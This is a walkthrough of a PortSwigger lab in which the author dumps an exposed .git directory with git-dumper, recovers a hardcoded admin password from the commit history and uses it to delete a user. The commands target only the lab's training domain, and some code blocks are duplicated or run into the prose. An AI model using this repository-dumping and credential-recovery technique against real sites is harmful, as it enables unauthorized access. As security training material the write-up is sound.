July 17, 2026
Information Disclosure in Version Control History
How I Solved PortSwigger’s “Information Disclosure in Version Control History” Lab

By Hasnainabid
1 min read
Introduction
In this walkthrough, I'll show you how I solved PortSwigger's Information Disclosure in Version Control History lab. This is a great example of why you should never expose your .git directory in production, and why environment variables should always be used for sensitive data.
Step 1: Initial Reconnaissance
The lab scenario: We need to obtain the administrator password, log in, and delete the user "carlos".
First, I discovered that the website was exposing its Git repository:
https://0af5007604a67b9580833fe400e60037.web-security-academy.net/.git
Step 2: Downloading the Git Repository
I used git-dumper — a Python tool specifically designed to download exposed Git repositories:
# Install git-dumper
pip3 install git-dumper
# Download the repository
git-dumper https://0af5007604a67b9580833fe400e60037.web-security-academy.net/.git/ ./repo
# Navigate to the repository
cd repo
# Install git-dumper
pip3 install git-dumper
# Download the repository
git-dumper https://0af5007604a67b9580833fe400e60037.web-security-academy.net/.git/ ./repo
# Navigate to the repository
cd repo
Step 3: Analyzing the Commit History
Once inside the repository, I checked the commit history:
git log - oneline
156800f (HEAD -> master) Remove admin password from config
07e9e68 Add skeleton admin panelgit log - oneline
156800f (HEAD -> master) Remove admin password from config
07e9e68 Add skeleton admin panelInteresting! There was a commit that specifically mentions removing an admin password. This is exactly what we're looking for.
Step 4: Extracting the Password
To see the full changes in each commit, I used:
git log -pgit log -pThis revealed the crucial information:
commit 156800fec6ff219dba3737f8cf8e06175ae98e90
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
diff - git a/admin.conf b/admin.conf
index 67513d1..21d23f1 100644
- - a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=8cuchggxtlvj3qx9omku
+ADMIN_PASSWORD=env('ADMIN_PASSWORD')commit 156800fec6ff219dba3737f8cf8e06175ae98e90
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
diff - git a/admin.conf b/admin.conf
index 67513d1..21d23f1 100644
- - a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=8cuchggxtlvj3qx9omku
+ADMIN_PASSWORD=env('ADMIN_PASSWORD')Bingo! The developer had hardcoded the password 8cuchggxtlvj3qx9omku and then "removed" it in a later commit. However, in Git, nothing is truly deleted — the password was still there in the commit history.
Step 5: Exploiting the Password
With the administrator password in hand, I navigated to the admin panel: https://0af5007604a67b9580833fe400e60037.web-security-academy.net/admin
I logged in with:
- Username:
administrator - Password:
8cuchggxtlvj3qx9omku
Step 6: Completing the Lab
Once logged in as administrator:
- Navigated to the user management section
- Found the user "carlos"
- Deleted the user account
The lab was solved! 🎉